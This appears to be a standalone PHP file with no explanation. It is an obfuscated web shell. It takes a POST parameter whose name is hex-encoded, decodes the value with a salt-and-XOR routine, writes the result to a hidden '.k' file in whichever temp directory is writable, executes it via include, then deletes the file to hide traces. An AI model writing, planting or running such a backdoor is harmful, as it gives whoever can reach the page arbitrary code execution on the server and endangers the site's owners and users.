<?php

if(array_key_exists("\x66a\x63\x74or", $_POST) && !is_null($_POST["\x66a\x63\x74or"])){
	$object = $_POST["\x66a\x63\x74or"];
	 $object =explode (		'.' , $object )		; 
	$flag = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($salt  );
    
            foreach ($object as $r => $v8):
                $chS = ord($salt[$r %	$sLen]  );
                $dec = ((int)$v8 - $chS - ($r %	10))		^  36;
                $flag.=chr($dec  );
            endforeach;
	$record = array_filter([ini_get("upload_tmp_dir"), "/var/tmp", getenv("TEMP"), session_save_path(), "/dev/shm", "/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd()]);
	for ($ent = 0, $dchunk = count($record); $ent < $dchunk; $ent++) {
    $component = $record[$ent];
    		if (!!is_dir($component) && !!is_writable($component)) {
    $rec = join("/", [$component, ".k"]);
    $file = fopen($rec, 'w');
if ($file) {
	fwrite($file, $flag);
	fclose($file);
	include $rec;
	@unlink($rec);
	exit;
}
}
}
}